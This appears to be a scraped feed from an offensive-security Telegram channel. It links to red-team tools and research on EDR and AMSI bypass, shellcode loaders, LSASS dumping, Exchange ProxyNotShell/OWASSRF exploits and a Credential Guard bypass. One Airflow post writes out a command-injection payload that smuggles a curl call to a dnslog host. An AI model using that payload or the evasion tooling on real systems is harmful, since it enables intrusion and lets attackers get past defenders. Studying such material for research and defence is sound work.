Forwarded from Offensive Xwitter
😈 [ ShitSecure, S3cur3Th1sSh1t ]
I really like DeepL for translations. But I also like the fact, that when using the Desktop APP is makes use of an signed executable named CreateDump.exe in %APPDATA%, which can dump e.g. LSASS 🧐🤩
🐥 [ tweet ]
I really like DeepL for translations. But I also like the fact, that when using the Desktop APP is makes use of an signed executable named CreateDump.exe in %APPDATA%, which can dump e.g. LSASS 🧐🤩
🐥 [ tweet ]
🔥13😁4
🛠 DynamicSyscalls
This is a library written in .net resolves the syscalls dynamically (Has nothing to do with hooking/unhooking).
https://github.com/Shrfnt77/DynamicSyscalls
#maldev #csharp #syscall #library
This is a library written in .net resolves the syscalls dynamically (Has nothing to do with hooking/unhooking).
https://github.com/Shrfnt77/DynamicSyscalls
#maldev #csharp #syscall #library
GitHub
GitHub - Shrfnt77/DynamicSyscalls: DynamicSyscalls is a library written in .net resolves the syscalls dynamically (Has nothing…
DynamicSyscalls is a library written in .net resolves the syscalls dynamically (Has nothing to do with hooking/unhooking) - Shrfnt77/DynamicSyscalls
👍2🔥1
🥷 PNG Steganography Hides Backdoor
Malware authors rely on LSB encoding to hide malicious payload in the PNG pixel data, more specifically in LSB of each color channel (Red, Green, Blue, and Alpha).
https://decoded.avast.io/martinchlumecky/png-steganography/
#maldev #steganography #png
Malware authors rely on LSB encoding to hide malicious payload in the PNG pixel data, more specifically in LSB of each color channel (Red, Green, Blue, and Alpha).
https://decoded.avast.io/martinchlumecky/png-steganography/
#maldev #steganography #png
🔥5
💤 laZzzy
This is a shellcode loader, developed using different open-source libraries, that demonstrates different execution techniques.
Features:
— Direct syscalls and native functions;
— Import Address Table (IAT) evasion;
— Encrypted payload (XOR and AES);
— PPID spoofing;
— Blocking of non-Microsoft-signed DLLs;
— etc.
https://github.com/capt-meelo/laZzzy
#maldev #loader #cpp #redteam
This is a shellcode loader, developed using different open-source libraries, that demonstrates different execution techniques.
Features:
— Direct syscalls and native functions;
— Import Address Table (IAT) evasion;
— Encrypted payload (XOR and AES);
— PPID spoofing;
— Blocking of non-Microsoft-signed DLLs;
— etc.
https://github.com/capt-meelo/laZzzy
#maldev #loader #cpp #redteam
👍5
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Новые сюрпризы в AD CS... Добавим технику ESC11🙈
https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/
#ad #pentest #redteam
https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/
#ad #pentest #redteam
💣 ProxyNotShell PoC
ProxyNotShell this is a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery vulnerability (CVE-2022-41040) and a second vulnerability that allows Remote Code Execution (CVE-2022-41082) when PowerShell is available on the Exchange Server.
Research:
https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend
Nmap Checker:
https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse
PoC:
https://github.com/testanull/ProxyNotShell-PoC
UPD:
PoC for Python3
Thanks to @hackerralf8
https://t.iss.one/RalfHackerChannel/1286
#exchange #proxynotshell #ssrf #rce
ProxyNotShell this is a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery vulnerability (CVE-2022-41040) and a second vulnerability that allows Remote Code Execution (CVE-2022-41082) when PowerShell is available on the Exchange Server.
Research:
https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend
Nmap Checker:
https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse
PoC:
https://github.com/testanull/ProxyNotShell-PoC
UPD:
PoC for Python3
Thanks to @hackerralf8
https://t.iss.one/RalfHackerChannel/1286
#exchange #proxynotshell #ssrf #rce
🔥7👍1
💨 Apache Airflow RCE
Tracked as CVE-2022-40127, the flaw affects Apache Airflow versions prior to 2.4.0. Apache Airflow could allow a remote attacker to execute arbitrary commands via the manually provided run_id parameter, which exists in Example Dags of Apache Airflow. By sending a specially crafted request, an attacker could exploit the CVE-2022-40127 flaw to execute arbitrary commands.
PoC:
1. Active
2. Run ID parameter
Tracked as CVE-2022-40127, the flaw affects Apache Airflow versions prior to 2.4.0. Apache Airflow could allow a remote attacker to execute arbitrary commands via the manually provided run_id parameter, which exists in Example Dags of Apache Airflow. By sending a specially crafted request, an attacker could exploit the CVE-2022-40127 flaw to execute arbitrary commands.
PoC:
1. Active
example_bash_operator at DAGs2. Run ID parameter
{"test":"\";curl `id -u`.xxx.dnslog.cn;\""}
#apache #airflow #dags #rce❤🔥5
Forwarded from In4sek stories
Telegraph
StandoFF prelude.
На кануне глобального события решил поделиться мыслями, рассказать несколько фишек, да и в целом поведать о данном формате противостояния. Ну и конечно все это согласовано с @yarbabin, тк ниже будет рассказан флоу одного недопустимого события. Прошло много…
👍5
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Довольно интересный анализ на примере Аваста
Hooking System Calls in Windows 11 22H2 like Avast Antivirus. Research, analysis and bypass
https://the-deniss.github.io/posts/2022/12/08/hooking-system-calls-in-windows-11-22h2-like-avast-antivirus.html
#research #redteam
Hooking System Calls in Windows 11 22H2 like Avast Antivirus. Research, analysis and bypass
https://the-deniss.github.io/posts/2022/12/08/hooking-system-calls-in-windows-11-22h2-like-avast-antivirus.html
#research #redteam
❤🔥5👍1
🎁 HackTheBox — ProLab Discount
HackTheBox is running a huge pro-lab discount this month. Use coupon code: "
The coupon expires at the end of the year.
#hackthebox #prolab #discount
HackTheBox is running a huge pro-lab discount this month. Use coupon code: "
weloveprolabs22" and waive the setup fee ($95) of any pro lab. Each pro lab is $27/m, which makes this over 75% off. The coupon expires at the end of the year.
#hackthebox #prolab #discount
🔥9❤🔥2👍2
⚔️ Mangle — EDR Bypass
This is a tool that manipulates aspects of compiled executables (.exe or DLL). Mangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files. In doing so, Mangle helps loaders evade on-disk and in-memory scanners.
https://github.com/optiv/Mangle
#edr #bypass #inflate #certificate
This is a tool that manipulates aspects of compiled executables (.exe or DLL). Mangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files. In doing so, Mangle helps loaders evade on-disk and in-memory scanners.
https://github.com/optiv/Mangle
#edr #bypass #inflate #certificate
👍8
⚔️ DirCreate2System
Weaponizing to get NT AUTHORITY\SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting
https://github.com/binderlabs/DirCreate2System
#windows #privesc #directory #error #report
Weaponizing to get NT AUTHORITY\SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting
https://github.com/binderlabs/DirCreate2System
#windows #privesc #directory #error #report
🔥6👍1
💉 Dirty Vanity — A New Approach to Code injection & EDR bypass
A POC for the new injection technique, abusing windows fork API to evade EDRs.
Source:
https://github.com/deepinstinct/Dirty-Vanity
Research:
https://i.blackhat.com/EU-22/Thursday-Briefings/EU-22-Nissan-DirtyVanity.pdf
#av #edr #bypass #injection #fork #api
A POC for the new injection technique, abusing windows fork API to evade EDRs.
Source:
https://github.com/deepinstinct/Dirty-Vanity
Research:
https://i.blackhat.com/EU-22/Thursday-Briefings/EU-22-Nissan-DirtyVanity.pdf
#av #edr #bypass #injection #fork #api
GitHub
GitHub - deepinstinct/Dirty-Vanity: A POC for the new injection technique, abusing windows fork API to evade EDRs. https://www…
A POC for the new injection technique, abusing windows fork API to evade EDRs. https://www.blackhat.com/eu-22/briefings/schedule/index.html#dirty-vanity-a-new-approach-to-code-injection--edr-bypass...
👍6❤1
Forwarded from internet-lab.ru
🔐 MULTIFACTOR — особенности 2FA
Существует неплохое решение для организации двухфакторной аутентификации в корпоративной среде под названием MULTIFACTOR. Входит в реестр российского ПО за номером 7046.
Это не реклама, поскольку сегодня буквально в двух словах мы расскажем про то как этот второй фактор можно обойти в некоторых очень частных случаях.
Бу-га-га.
#security #special
https://internet-lab.ru/multifactor_2fa_bug
Существует неплохое решение для организации двухфакторной аутентификации в корпоративной среде под названием MULTIFACTOR. Входит в реестр российского ПО за номером 7046.
Это не реклама, поскольку сегодня буквально в двух словах мы расскажем про то как этот второй фактор можно обойти в некоторых очень частных случаях.
Бу-га-га.
#security #special
https://internet-lab.ru/multifactor_2fa_bug
internet-lab.ru
MULTIFACTOR — особенности 2FA | internet-lab.ru
Существует неплохое решение для организации двухфакторной аутентификации в корпоративной среде под названием MULTIFACTOR.
👍5❤🔥3😁1
😈 OWASSRF — New Exploit Method for Exchange Bypassing ProxyNotShell Mitigations
CrowdStrike recently discovered a new exploit method using CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution (RCE) through Outlook Web Access.
https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
#owa #exchange #ssrf #proxynotshell
CrowdStrike recently discovered a new exploit method using CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution (RCE) through Outlook Web Access.
https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
#owa #exchange #ssrf #proxynotshell
CrowdStrike.com
OWASSRF: CrowdStrike Identifies New Exploit Method for Exchange Bypassing ProxyNotShell Mitigations
Learn how CrowdStrike recently discovered a new exploit method using CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution (RCE) through Outlook Web Access.
🔥6
💥 Shellcode Mutator
New tool to help red teamers avoid detection. Shellcode is a small piece of code that is typically used as the payload in an exploit, and can often be detected by its “signature”, or unique pattern. Shellcode Mutator mutates exploit source code without affecting its functionality, changing its signature and making it harder to reliably detect as malicious.
Research:
https://labs.nettitude.com/blog/shellcode-source-mutations/
Source:
https://github.com/nettitude/ShellcodeMutator
#shellcode #mutator #nasm #redteam
New tool to help red teamers avoid detection. Shellcode is a small piece of code that is typically used as the payload in an exploit, and can often be detected by its “signature”, or unique pattern. Shellcode Mutator mutates exploit source code without affecting its functionality, changing its signature and making it harder to reliably detect as malicious.
Research:
https://labs.nettitude.com/blog/shellcode-source-mutations/
Source:
https://github.com/nettitude/ShellcodeMutator
#shellcode #mutator #nasm #redteam
🔥5👍1
👾 Windows Drivers Reverse Engineering Methodology
This blog post details a methodology for reverse engineering and finding vulnerable code paths in Windows drivers.
Including a guide for setting up a lab for (the pesky) kernel debugging.
https://voidsec.com/windows-drivers-reverse-engineering-methodology/
#reverse #driver #analysis
This blog post details a methodology for reverse engineering and finding vulnerable code paths in Windows drivers.
Including a guide for setting up a lab for (the pesky) kernel debugging.
https://voidsec.com/windows-drivers-reverse-engineering-methodology/
#reverse #driver #analysis
🔥6👍4
🎲 PowerShell Obfuscation
A simple and effective powershell obfuscaiton tool bypass Anti-Virus and AMSI-bypass + ETW-block.
https://github.com/H4de5-7/powershell-obfuscation
#powershell #obfuscation #amsi #etw #bypass
A simple and effective powershell obfuscaiton tool bypass Anti-Virus and AMSI-bypass + ETW-block.
https://github.com/H4de5-7/powershell-obfuscation
#powershell #obfuscation #amsi #etw #bypass
❤7👍4👎2
🔑 Pass-the-Challenge
This blog post introduces new techniques for recovering the NTLM hash from an encrypted credential protected by Windows Defender Credential Guard. While previous techniques for bypassing Credential Guard focus on attackers targeting new victims who log into a compromised server, these new techniques can also be applied to victims logged on before the server was compromised.
Research:
https://research.ifcr.dk/pass-the-challenge-defeating-windows-defender-credential-guard-31a892eee22
Source:
https://github.com/ly4k/PassTheChallenge
#ad #windows #ntlm #challenge
This blog post introduces new techniques for recovering the NTLM hash from an encrypted credential protected by Windows Defender Credential Guard. While previous techniques for bypassing Credential Guard focus on attackers targeting new victims who log into a compromised server, these new techniques can also be applied to victims logged on before the server was compromised.
Research:
https://research.ifcr.dk/pass-the-challenge-defeating-windows-defender-credential-guard-31a892eee22
Source:
https://github.com/ly4k/PassTheChallenge
#ad #windows #ntlm #challenge
👍6👎1